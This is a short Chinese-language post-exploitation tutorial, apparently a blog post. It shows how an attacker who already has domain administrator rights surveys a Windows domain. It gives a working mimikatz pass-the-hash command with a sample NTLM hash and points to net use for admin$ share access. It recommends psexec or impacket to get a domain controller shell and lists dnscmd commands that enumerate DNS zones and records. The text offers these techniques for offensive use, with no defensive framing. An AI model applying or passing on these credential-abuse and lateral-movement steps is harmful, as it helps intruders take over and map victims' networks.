拿到域管权限后的域内网络拓扑
CATALOG
1.前言
拿到域管权限后我们除了做权限维持之外还需要对域内的网络情况进行探索,这篇文章就这项技能做一个概述。
2.实现本机使用dnscmd进行远程查询
首先我们需要利用域管凭据获得admin$共享,或者直接获得域控机器的shell。
2.1 获取拥有admin$共享权限的shell
使用mimikatz的pth攻击或者直接使用net use命令,这两种方法都需要管理员权限的shell,否则都会失败,所以提权很重要。
- mimikatz
privilege::Debug
sekurlsa::pth /user:Administrator /domain:test.com /ntlm:3dbde697d71690a769204beb12283678 - net use
2.2 获取admin$共享后的操作
下载dnscmd.exe与dnscmd.exe.mui:
可用下载地址:
https://github.com/3gstudent/test/blob/master/dnscmd.exe
下载dnscmd.exe.mui保存在C:\Windows\System32\en-US下
可用下载地址:
https://github.com/3gstudent/test/blob/master/dnscmd.exe.mui
2.3获取dns记录
- 枚举域
Dnscmd yukong.test.com /EnumZones - 列出域的信息
Dnscmd yukong.test.com /ZoneInfo test.com - 列出记录
Dnscmd yukong.test.com /EnumRecords test.com .
3.使用域控的shell进行查询
3.1使用工具获取域控的shell
使用psexec或者impacket都可以。
如果psexec不好用,使用impacket即可。如果非要用psexec,则尽量在图形化页面使用,按住shift点击
3.2执行命令进行查询
-
Dnscmd /EnumZones
-
Dnscmd /ZoneInfo test.com
-
Dnscmd /EnumRecords test.com .